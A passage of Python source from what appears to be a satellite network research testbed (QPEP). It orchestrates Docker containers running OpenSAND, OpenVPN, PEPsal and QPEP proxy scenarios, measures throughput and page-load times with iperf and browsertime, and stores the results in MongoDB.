simulation_running = response.count('RUNNING') > 3
# now that the network is running, it is possible to add ip routes from user terminal through the network
logger.debug("Connecting User Terminal to Satellite Spot Beam")
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.3")
logger.debug("Starting PEPsal on terminal workstation")
terminal_client = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_client.exec_run("bash /opensand_config/launch_pepsal.sh")
logger.debug("Deploying PEPsal on Gateway Endpoint")
gateway_client = docker_client.containers.get(os.getenv("GW_CONTAINER_NAME"))
gateway_client.exec_run("bash /opensand_config/launch_pepsal.sh")
logger.success("OpeSAND Testbed Running")
def stop_testbed(self):
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"])
def connect_terminal_workstation(self):
logger.debug("Starting User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
logger.debug("Adding External Route to Docker Host for GUI Services")
workstation_container.exec_run("ip route add " + str(self.host_ip) + " via " + str(os.getenv("GUI_NETWORK_HEAD"))+".0.1 dev eth1")
logger.debug("Connecting User Workstation to Satellite Router")
workstation_container.exec_run("ip route del default")
workstation_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Client Workstation Connected to Satellite Network")
def connect_sitespeed_workstation(self):
logger.debug("Starting Sitespeed Workstation")
docker_client = docker.from_env()
sitespeed_container = docker_client.containers.get(os.getenv("SITESPEED_CONTAINER_NAME"))
sitespeed_container.exec_run("ip route del default")
sitespeed_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Sitespeed Workstation Connected to Satellite Network")
def launch_wireshark(self):
logger.debug("Starting Wireshark on Satellite Endpoint")
docker_client = docker.from_env()
satellite_container = docker_client.containers.get(os.getenv("SAT_CONTAINER_NAME"))
satellite_container.exec_run("wireshark", detach=True)
def launch_web_browser(self):
logger.debug("Launching Web Browser on User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
workstation_container.exec_run("qupzilla", detach=True)
def set_downlink_attenuation(self, attenuation_value=0):
logger.debug("Setting OpenSAND Downlink Attenuation to " + str(attenuation_value))
gw_path = 'satellite/attenuation_scenario/gw0/plugins/ideal.conf'
st_path = 'satellite/attenuation_scenario/st1/plugins/ideal.conf'
gw_conf = ET.parse(gw_path)
st_conf = ET.parse(st_path)
xml_confs = [gw_conf.getroot(), st_conf.getroot()]
for conf in xml_confs:
attenuation_settings = conf.findall('ideal/ideal_attenuations/ideal_attenuation')
for setting in attenuation_settings:
if setting.attrib["link"] == "down":
setting.set("attenuation_value", str(attenuation_value))
gw_conf.write(gw_path)
st_conf.write(st_path)
logger.debug("Updated Downlink Attenuations")
def set_plr_percentage(self, plr_percentage, st_out=False, gw_out=True):
logger.debug("Configuring Packet Loss Rate")
docker_client = docker.from_env()
containers_to_mod = []
if st_out:
logger.debug("Setting PLR for ST->GW at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("ST_CONTAINER_NAME")))
if gw_out:
logger.debug("Setting PLR for GW->ST at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("GW_CONTAINER_NAME")))
for container in containers_to_mod:
response = container.exec_run('/sbin/tc qdisc change dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
if "RTNETLINK" in str(response.output):
container.exec_run('/sbin/tc qdisc add dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
logger.debug("Updated PLR to " + str(plr_percentage) + "%")
def run_attenuation_scenario(self):
logger.debug("Running Attenuation Scenario")
# wait to connect to opensand
opensand_launched = False
nc = None
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
opensand_launched = True
except:
continue
logger.debug("Connected to NC Listener")
# stop running scenarios if any
nc.send(b'stop\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# opensand reports that the testbed has stopped a little before it actually has
time.sleep(1)
# load attenuation scenario
nc.send(b'scenario attenuation_scenario\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# start new scenario
nc.send(b'start\n')
nc.recv_until(b'OK', timeout=10)
logger.debug("Scenario Restarted")
nc.recv()
# ensure that the terminal modem is still connected
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
#terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD"))+".0.3")
logger.debug("Attenuation Scenario Launched")
```
#### File: qpep/realworld-testbed/benchmarks.py
```python
from statistics import mean
from loguru import logger
from abc import ABC, abstractmethod
import docker
import json
import time
import re
from pymongo import MongoClient
import pymongo
from datetime import datetime
import os
from dotenv import load_dotenv
load_dotenv()
load_dotenv(str(os.getenv("SERVER_ENV")))
load_dotenv(str(os.getenv("CLIENT_ENV")))
alexa_top_20 = [
"https://www.google.com",
"https://www.youtube.com",
"https://www.tmall.com",
"https://www.facebook.com",
"https://www.baidu.com",
"https://www.qq.com",
"https://www.sohu.com",
"https://www.taobao.com",
"https://www.360.cn",
"https://www.jd.com",
"https://www.yahoo.com",
"https://www.amazon.com",
"https://www.wikipedia.org",
"https://www.weibo.com",
"https://www.sina.com.cn",
"https://www.reddit.com",
"https://www.live.com",
"https://www.netflix.com",
"https://www.okezone.com",
"https://www.vk.com"
]
class Benchmark(ABC):
def __init__(self, name=""):
self.results = {}
self.name = name
@abstractmethod
def run(self):
pass
def print_results(self):
print(self.results)
def save_results_to_file(self, filename):
with open(filename, 'w') as outfile:
json.dump(self.results, outfile)
def push_to_db(self, collection_name, data):
try:
client = MongoClient(os.getenv("FIRST_DB_LOGIN_STR"), connectTimeoutMS=3000,serverSelectionTimeoutMS=5000)
logger.debug(client.server_info())
except pymongo.errors.ServerSelectionTimeoutError:
logger.warning('Could not connect to DB Server '+os.getenv("FIRST_DB_NAME"))
try:
client = MongoClient(os.getenv("SECOND_DB_LOGIN_STR"), connectTimeoutMS=3000,serverSelectionTimeoutMS=5000)
logger.debug(client.server_info())
except pymongo.errors.ServerSelectionTimeoutError:
logger.warning('Could not connect to DB Server '+os.getenv("SECOND_DB_NAME"))
logger.warning('Could not upload results to DB')
else:
db = client[os.getenv("DB_NAME")]
db[collection_name].insert_one(data)
logger.debug('uploaded to DB Server '+os.getenv("SECOND_DB_NAME"))
else:
db = client[os.getenv("DB_NAME")]
db[collection_name].insert_one(data)
logger.debug('uploaded to DB Server'+os.getenv("FIRST_DB_NAME"))
@abstractmethod
def save_results_to_db(self, scenario_name, testbed_name):
pass
def make_keys_mongoDB_compatible(self, data):
# MongoDB does not accept '.' in keys so we need to replace them
new_data = {}
for key in data.keys():
new_key = key.replace(".","-")
new_data[new_key] = data[key]
return new_data
class IperfBenchmark(Benchmark):
def __init__(self, file_sizes, server_address=os.getenv("IPERF_SERVER_ADDRESS"), bw_limit="8000M", reset_on_run=True, iterations=1):
self.file_sizes = file_sizes
self.bw_limit = bw_limit
self.reset_on_run = reset_on_run
self.server_address = server_address
self.iterations = iterations
super().__init__(name="IPerf")
def run(self):
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
for i in range(0, self.iterations):
for file_size in self.file_sizes:
try:
test_results = self.run_iperf_test(file_size, self.reset_on_run, self.bw_limit)
except KeyboardInterrupt:
break
except:
logger.info("Iperf measurement Failed - Probably Docker Connection issue")
test_results = {
"sent_bytes": 0,
"sent_bps": 0,
"received_bytes": 0,
"received_bps": 0
}
result_name = "iperf_" + str(round(file_size/1000000, 3)) + "mb"
if result_name not in self.results.keys():
self.results[result_name] = {}
for key in test_results.keys():
self.results[result_name][key] = [test_results[key]]
else:
for key in test_results.keys():
self.results[result_name][key].append(test_results[key])
print("Interim Results (Iter:", i+1, " of ", self.iterations, "):", self.results)
def run_iperf_test(self, transfer_bytes, reset_on_run, bw_limit, with_timeout=True, timeout=600):
logger.debug("Starting iperf server")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
if reset_on_run:
gateway_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
gateway_workstation.exec_run("iperf3 -s", detach=True)
logger.debug("Starting iperf client")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
if reset_on_run:
terminal_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
if with_timeout:
exit_code, output = terminal_workstation.exec_run("/usr/bin/timeout --signal=SIGINT " + str(timeout) +" /usr/bin/iperf3 --no-delay -b "+bw_limit+" -c " + str(self.server_address)+ " -R --json -n " + str(transfer_bytes))
else:
exit_code, output = terminal_workstation.exec_run("iperf3 --no-delay -b "+bw_limit+" -c " + str(self.server_address)+ " -R --json -n " + str(transfer_bytes))
json_string = output.decode('unicode_escape').rstrip('\n').replace('Linux\n', 'Linux') # there's an error in iperf3's json output here
try:
test_result = json.loads(json_string)
except:
json_string = "error - control socket has closed unexpectedly"
if "error - control socket has closed unexpectedly" in json_string:
logger.debug("IPerf connect socket lost, download failed")
return {
"sent_bytes": 0,
"sent_bps": 0,
"received_bytes": 0,
"received_bps": 0
}
try:
logger.debug("Iperf Result: " + str(test_result["end"]["sum_sent"]["bits_per_second"]/1000000) +
"/" + str(test_result["end"]["sum_received"]["bits_per_second"]/1000000))
except:
logger.error("Unable to parse iperf result")
print(json_string)
return {
"sent_bytes": 0,
"sent_bps": 0,
"received_bytes": 0,
"received_bps": 0
}
return {
"sent_bytes": test_result["end"]["sum_sent"]["bytes"],
"sent_bps": test_result["end"]["sum_sent"]["bits_per_second"],
"received_bytes": test_result["end"]["sum_received"]["bytes"],
"received_bps": test_result["end"]["sum_received"]["bits_per_second"],
}
def print_results(self):
print("Full Results: ")
print(self.results)
print("~"*25)
print("Average Speeds: ")
for result_key in self.results.keys():
print(result_key, "sent_bps:", mean(self.results[result_key]["sent_bps"]) / 1000000)
print(result_key, "received_bps:", mean(self.results[result_key]["received_bps"])/ 1000000)
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output.")
ping = "9999"
logger.debug("Ping[ms]:"+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"bw_limit": self.bw_limit,
"measurements": self.make_keys_mongoDB_compatible(self.results)
})
logger.debug(data)
if data["measurements"] != {}:
logger.debug("Uploading to DB")
self.push_to_db("iperf_TCP",data)
class IperfUDPBenchmark(Benchmark):
def __init__(self, file_sizes, bw_limit="50M", iterations=1):
self.file_sizes = file_sizes
self.bw_limit = bw_limit
self.iterations = iterations
super().__init__(name="IPerfUDP")
def run(self):
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
for i in range(0, self.iterations):
for file_size in self.file_sizes:
try:
test_results = self.run_iperf_test(file_size, self.bw_limit)
except KeyboardInterrupt:
break
except:
logger.info("Iperf measurement Failed - Probably Docker Connection issue")
test_results = {
'seconds': 0,
'bytes': 0,
'bits_per_second': 0,
'lost_packets': 0,
'packets': 0,
'lost_percent': 0
}
result_name = "iperf_" + str(round(file_size/1000000, 3)) + "mb"
if result_name not in self.results.keys():
self.results[result_name] = {}
for key in test_results.keys():
self.results[result_name][key] = [test_results[key]]
else:
for key in test_results.keys():
self.results[result_name][key].append(test_results[key])
print("Interim Results (Iter:", i+1, " of ", self.iterations, "):", self.results)
def run_iperf_test(self, transfer_bytes, bw_limit, with_timeout=True, timeout=600):
logger.debug("Starting iperf server")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
gateway_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
gateway_workstation.exec_run("iperf3 -s", detach=True)
logger.debug("Starting iperf client")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
exit_code, output = terminal_workstation.exec_run("iperf3 -u -b "+bw_limit+" --no-delay -c " + str(os.getenv("IPERF_SERVER_ADDRESS"))+ " -R --json -n " + str(transfer_bytes))
json_string = output.decode('unicode_escape').rstrip('\n').replace('Linux\n', 'Linux') # there's an error in iperf3's json output here
try:
test_result = json.loads(json_string)
except:
json_string = "error - control socket has closed unexpectedly"
if "error - control socket has closed unexpectedly" in json_string:
logger.debug("IPerf connect socket lost, download failed")
return {
"seconds": 0,
"bytes": 0,
"bits_per_second": 0,
"lost_packets": 0,
"packets": 0,
"lost_percent": 0
}
try:
logger.debug("Iperf Result: " + str(test_result["end"]["sum"]["bits_per_second"]/1000000) +
"/" + str(test_result["end"]["sum"]["lost_percent"])+"%")
except:
logger.error("Unable to parse iperf result")
print(json_string)
return {
"seconds": 0,
"bytes": 0,
"bits_per_second": 0,
"lost_packets": 0,
"packets": 0,
"lost_percent": 0
}
return {
"seconds": test_result["end"]["sum"]["seconds"],
"bytes": test_result["end"]["sum"]["bytes"],
"bits_per_second": test_result["end"]["sum"]["bits_per_second"],
"lost_packets": test_result["end"]["sum"]["lost_packets"],
"packets": test_result["end"]["sum"]["packets"],
"lost_percent": test_result["end"]["sum"]["lost_percent"]
}
def print_results(self):
print("Full Results: ")
print(self.results)
print("~"*25)
print("Average Speeds: ")
for result_key in self.results.keys():
print(result_key, "bits_per_second:", mean(self.results[result_key]["bits_per_second"]) / 1000000)
print(result_key, "lost_percent:", mean(self.results[result_key]["lost_percent"]))
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output.")
ping = 9999
logger.debug("Ping: "+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"bw_limit": self.bw_limit,
"measurements": self.make_keys_mongoDB_compatible(self.results)
})
print(data)
if data["measurements"] != {}:
self.push_to_db("iperf_UDP",data)
class ChannelCharBenchmark(Benchmark):
def __init__(self, send_time, bw_limit="5M", reset_on_run=True):
self.send_time = send_time
self.bw_limit = bw_limit
self.reset_on_run = reset_on_run
super().__init__(name="iperf_CH")
def run(self):
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
try:
test_results = self.run_iperf_test(self.send_time, self.reset_on_run)
except KeyboardInterrupt:
logger.warning("Keyboard Interrupt")
except:
logger.info("Iperf measurement Failed - Probably Docker Connection issue")
test_results = []
self.results = test_results
def run_iperf_test(self,send_time, reset_on_run, timeout=600):
logger.debug("Starting iperf server")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
if reset_on_run:
gateway_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
gateway_workstation.exec_run("iperf3 -s", detach=True)
logger.debug("Starting iperf client")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
if reset_on_run:
terminal_workstation.exec_run("pkill -9 iperf3")
time.sleep(1)
exit_code, output = terminal_workstation.exec_run("/usr/bin/timeout --signal=SIGINT " + str(timeout) +" /usr/bin/iperf3 --no-delay -c " + str(os.getenv("IPERF_SERVER_ADDRESS"))+ " -R --json -b "+str(self.bw_limit)+" -t "+str(self.send_time))
json_string = output.decode('unicode_escape').rstrip('\n').replace('Linux\n', 'Linux') # there's an error in iperf3's json output here
try:
test_result = json.loads(json_string)
except:
json_string = "error - control socket has closed unexpectedly"
if "error - control socket has closed unexpectedly" in json_string:
logger.debug("IPerf connect socket lost, download failed")
return []
try:
logger.debug("Iperf Result: " + str(test_result["end"]["sum_sent"]["bits_per_second"]/1000000) +
"/" + str(test_result["end"]["sum_received"]["bits_per_second"]/1000000))
except:
logger.error("Unable to parse iperf result")
print(json_string)
return []
return [ result["sum"]["bits_per_second"] for result in test_result["intervals"]]
def print_results(self):
print("~"*25)
print("Full Results: ")
print(self.results)
print("~"*25)
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output.")
ping = "9999"
logger.debug("Ping[ms]:"+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"bw_limit": self.bw_limit,
"measurements": self.results
})
logger.debug(data)
if data["measurements"] != []:
logger.debug("Uploading to DB")
self.push_to_db("iperf_CH",data)
class SitespeedBenchmark(Benchmark):
def __init__(self, hosts=alexa_top_20, iterations=1, average_only=False, scenario=None, sub_iterations=1):
self.hosts = hosts
self.iterations = iterations
self.average_only = average_only
super().__init__(name="SiteSpeed")
self.results = {}
self.errors = 0
self.scenario = scenario
self.sub_iterations = sub_iterations
def run(self):
logger.debug("Launching SiteSpeed.io Tests")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_workstation.exec_run("wget http://1.1.1.1") #use this to warm up vpns/peps
host_string = ''
for i in range(0, self.iterations):
for host in self.hosts:
host_string = host + " "
try:
host_result = terminal_workstation.exec_run('/usr/bin/browsertime -n ' + str(self.sub_iterations) +' --headless --browser firefox --cacheClearRaw --firefox.geckodriverPath /usr/bin/geckodriver --firefox.preference network.dns.disableIPv6:true --video=false --visualMetrics=false --visualElements=false ' + str(host_string))
except KeyboardInterrupt:
break
except:
logger.debug("Could not get result for "+str(host)+" due to errors")
continue
matches = re.findall('Load: ([0-9.]+)([ms])', str(host_result))
if self.sub_iterations > 0:
matches = matches[:-1] # the last match is the average load time, which we don't want mixing up our stats
for match in matches:
# if the connection measures in milliseconds we take as is, otherwise convert
if match[1] == 'm':
host_val = float(match[0])
elif match[1] == 's':
host_val = float(match[0]) * 1000
if host not in self.results.keys():
self.results[host] = [host_val]
else:
self.results[host].append(host_val)
print(host_result)
if len(matches) == 0:
logger.warning("No browsertime measurement for " + str(host_string))
else:
logger.debug("Browsertime: " + str(host_string) + " " + str(match[0]) + str(match[1]))
#count failed connections for host
error_matches = re.findall('UrlLoadError', str(host_result))
self.errors = self.errors + len(error_matches)
logger.debug("Browsertime Error Count: " + str(len(error_matches)) + " " + host)
print("Interim Results: ","(", self.name,")", self.results)
if i != self.iterations - 1:
self.scenario.deploy_scenario()
def print_results(self):
print(self.results)
#print("Mean page load time: ", mean(self.results))
#print("Load time measurements: ", self.results)
print("Failed load count: ", self.errors)
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output. ")
ping = 9999
logger.debug("Ping: "+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"measurements": self.make_keys_mongoDB_compatible(self.results)
})
logger.debug(data)
if data["measurements"] != {}:
self.push_to_db("sitespeed",data)
if __name__ == "__main__":
benchmark = SitespeedBenchmark()
benchmark.save_results_to_db("test","realworld")
```
#### File: qpep/realworld-testbed/scenarios.py
```python
from abc import ABC, abstractmethod
from loguru import logger
import docker
import time
import os
from dotenv import load_dotenv
load_dotenv()
load_dotenv(str(os.getenv("SERVER_ENV")))
load_dotenv(str(os.getenv("CLIENT_ENV")))
class Scenario(ABC):
def __init__(self, name, testbed, benchmarks):
self.name = name
self.testbed = testbed
self.benchmarks = benchmarks
@abstractmethod
def deploy_scenario(self):
self.testbed.start_testbed()
def run_benchmarks(self, deployed=False):
for benchmark in self.benchmarks:
if not deployed:
self.deploy_scenario()
benchmark.run()
def print_results(self):
print("*"*25)
print("Benchmark Results for ", self.name)
print("*"*25)
for benchmark in self.benchmarks:
print("****", benchmark.name, "****")
benchmark.print_results()
class PlainScenario(Scenario):
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
logger.debug("Configuring proxy on Terminal WS")
terminal_workstation.exec_run("export http_proxy=http://"+os.getenv("PROXY_SRV_URL")+":5001")
terminal_workstation.exec_run("export https_proxy=https://"+os.getenv("PROXY_SRV_URL")+":5001")
class OpenVPNScenario(Scenario):
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
# Satellite latency means that it takes OpenVPN a long time to establish the connection, waiting is easiest
logger.debug("Launching OVPN and waiting...remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT")))
terminal_workstation.exec_run("openvpn --remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT"))+" udp --config /root/client.ovpn --daemon")
time.sleep(20)
class OpenVPNTCPScenario(Scenario):
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
# Satellite latency means that it takes OpenVPN a long time to establish the connection, waiting is easiest
logger.debug("Launching OVPN and waiting...remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT")))
terminal_workstation.exec_run("openvpn --remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT"))+" tcp --config /root/client.ovpn --daemon")
time.sleep(20)
class QPEPScenario(Scenario):
def __init__(self, name, testbed, benchmarks, multi_stream=True):
self.multi_stream = multi_stream
super().__init__(name, testbed, benchmarks)
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
logger.debug("Configuring Client Side of QPEP Proxy")
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("bash ./tmp/config/configure_qpep.sh")
logger.debug("Configuring Gateway Side of QPEP Proxy")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
if testbed_up:
# kill running QPEP services for fresh start
gateway_workstation.exec_run("pkill -9 main")
terminal_container.exec_run("pkill -9 main")
logger.debug("Launching QPEP Client")
terminal_container.exec_run("go run /root/go/src/qpep/main.go -client -gateway "+os.getenv("QPEP_SRV_URL")+" -port "+os.getenv("QPEP_SRV_PORT"), detach=True)
logger.debug("Launching QPEP Gateway")
gateway_workstation.exec_run("go run /root/go/src/qpep/main.go -port "+os.getenv("QPEP_SRV_PORT"), detach=True)
logger.success("QPEP Running")
class QPEPAckScenario(Scenario):
def deploy_scenario(self, testbed_up=False, ack_level=4):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
gateway_workstation = docker_client.containers.get(os.getenv("WS_GW_CONTAINER_NAME"))
if testbed_up:
logger.debug("Killing any prior QPEP")
terminal_container.exec_run("pkill -9 main")
gateway_workstation.exec_run("pkill -9 main")
time.sleep(1)
else:
logger.debug("Configuring Client Side of QPEP Proxy")
terminal_container.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Configuring Gateway Side of QPEP Proxy")
gateway_workstation.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Launching QPEP Client")
terminal_container.exec_run("go run /root/go/src/qpep/main.go -client -minBeforeDecimation 2 -ackDelay 8000 -varAckDelay 16.0 -gateway " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.9 -acks " + str(ack_level), detach=True)
logger.debug("Launching QPEP Gateway")
gateway_workstation.exec_run("go run /root/go/src/qpep/main.go -minBeforeDecimation 2 -ackDelay 8000 -varAckDelay 16.0", detach=True)
logger.success("QPEP Running")
class QPEPCongestionScenario(Scenario):
def deploy_scenario(self, testbed_up=False, congestion_window=10):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
gateway_workstation = docker_client.containers.get(os.getenv("WS_GW_CONTAINER_NAME"))
if testbed_up:
logger.debug("Killing any prior QPEP")
terminal_container.exec_run("pkill -9 main")
gateway_workstation.exec_run("pkill -9 main")
time.sleep(1)
else:
logger.debug("Configuring Client Side of QPEP Proxy")
terminal_container.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Configuring Gateway Side of QPEP Proxy")
gateway_workstation.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Launching QPEP Client")
terminal_container.exec_run("go run /root/go/src/qpep/main.go -client -gateway " + str(os.getenv("GW_NETWORK_HEAD")) +".0.9 -congestion " + str(congestion_window), detach=True)
logger.debug("Launching QPEP Gateway")
gateway_workstation.exec_run("go run /root/go/src/qpep/main.go -congestion " + str(congestion_window), detach=True)
logger.success("QPEP Running")
class PEPsalScenario(Scenario):
def __init__(self, name, testbed, benchmarks, terminal=True, gateway=False):
self.terminal = terminal
self.gateway = gateway
super().__init__(name=name, testbed=testbed, benchmarks=benchmarks)
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
logger.debug("Starting PEPsal Scenario")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_client = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
logger.debug("Configuring proxy on Terminal WS")
terminal_workstation.exec_run("export http_proxy=http://"+os.getenv("PROXY_SRV_URL")+":5001")
terminal_workstation.exec_run("export https_proxy=https://"+os.getenv("PROXY_SRV_URL")+":5001")
if self.terminal and self.gateway:
logger.debug("Deploying PEPsal in Distributed Mode")
if self.terminal:
logger.debug("Deploying PEPsal on Terminal Endpoint")
terminal_client.exec_run("bash ./tmp/config/launch_pepsal.sh")
if self.gateway:
logger.debug("Deploying PEPsal on Gateway Endpoint")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
gateway_workstation.exec_run("bash ./tmp/launch_pepsal.sh")
```
#### File: qpep/realworld-testbed/testbeds.py
```python
import subprocess
import os
from loguru import logger
import docker
import xml.etree.ElementTree as ET
from dotenv import load_dotenv
load_dotenv()
class RealWorldTestbed(object):
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbed: local")
subprocess.call(["/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_CLIENT") ,"down"], stderr=subprocess.DEVNULL)
logger.debug("Shutting Down Previous Testbeds: remote")
subprocess.call(["ssh", os.getenv("DOCKER_REMOTE_URL"), "/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_SERVER") ,"down"], stderr=subprocess.DEVNULL)
logger.debug("Starting local Testbed Containers")
# Start the docker containers
subprocess.call(["/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_CLIENT") , "up", "-d"])
logger.debug("Starting remote Testbed Containers")
subprocess.call(["ssh", os.getenv("DOCKER_REMOTE_URL"), "/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_SERVER") , "up", "-d"])
logger.success("Real-world Testbed Running")
def stop_testbed(self):
logger.debug("Shutting Down Testbed: local")
subprocess.call(["/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_CLIENT") ,"down"], stderr=subprocess.DEVNULL)
logger.debug("Shutting Down Testbeds: remote")
subprocess.call(["ssh", os.getenv("DOCKER_REMOTE_URL"), "/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_SERVER") ,"down"], stderr=subprocess.DEVNULL)
if __name__ == '__main__':
#subprocess.call(["docker-compose", "-f", os.getenv("COMPOSE_SERVER") ,"down"], stderr=subprocess.DEVNULL)
